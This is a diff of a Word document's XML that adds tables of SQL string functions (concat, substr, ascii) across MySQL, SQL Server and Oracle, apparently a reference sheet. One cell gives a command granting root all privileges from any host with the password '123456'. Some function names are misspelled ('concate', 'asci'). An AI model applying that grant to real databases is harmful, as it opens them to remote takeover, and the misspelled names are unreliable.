+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>concate(str1,str2,str3,</w:t>
+            </w:r>
+            <w:r>
+              <w:t>…)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>将多个字符串拼接为一个，界定符为逗号（，）</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>concate_ws(delimiter,str1,str2,</w:t>
+            </w:r>
+            <w:r>
+              <w:t>…)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>指定界定符，将多个字符串拼接</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+              </w:rPr>
+              <w:t>GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
           </w:p>
         </w:tc>
@@ -25743,6 +27035,941 @@
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>substr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>函数</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1413"/>
+        <w:gridCol w:w="3532"/>
+        <w:gridCol w:w="3351"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>数据库</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>函数</w:t>
+            </w:r>
+            <w:r>
+              <w:t>或命令</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>注释</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>MySQL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>substr(‘string’,start[,length])</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ing</w:t>
+            </w:r>
+            <w:r>
+              <w:t>(‘string’,start[,length])</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>从字符串</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>string</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的第</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>start</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>位起，顺序取其</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>length</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>位。</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>start</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>从</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>开始计数</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SQL Server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ing</w:t>
+            </w:r>
+            <w:r>
+              <w:t>(‘string’,start[,length])</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+            <w:vMerge/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Oracle</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>substr(‘string’,start[,length])</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+            <w:vMerge/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ascii</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>函数</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1413"/>
+        <w:gridCol w:w="3532"/>
+        <w:gridCol w:w="3351"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>数据库</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>函数</w:t>
+            </w:r>
+            <w:r>
+              <w:t>或命令</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>注释</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>MySQL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>asci(‘char’)</w:t>
+            </w:r>
+            <w:r>
+              <w:t>,ord(‘char’)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回</w:t>
+            </w:r>
+            <w:r>
+              <w:t>’char’</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>第一个</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>字符的十进制</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ascii</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>码。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>反向函数为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>char(FF,FF,FD,FE)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SQL Server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC" w:themeFill="text1" w:themeFillTint="33"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Oracle</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
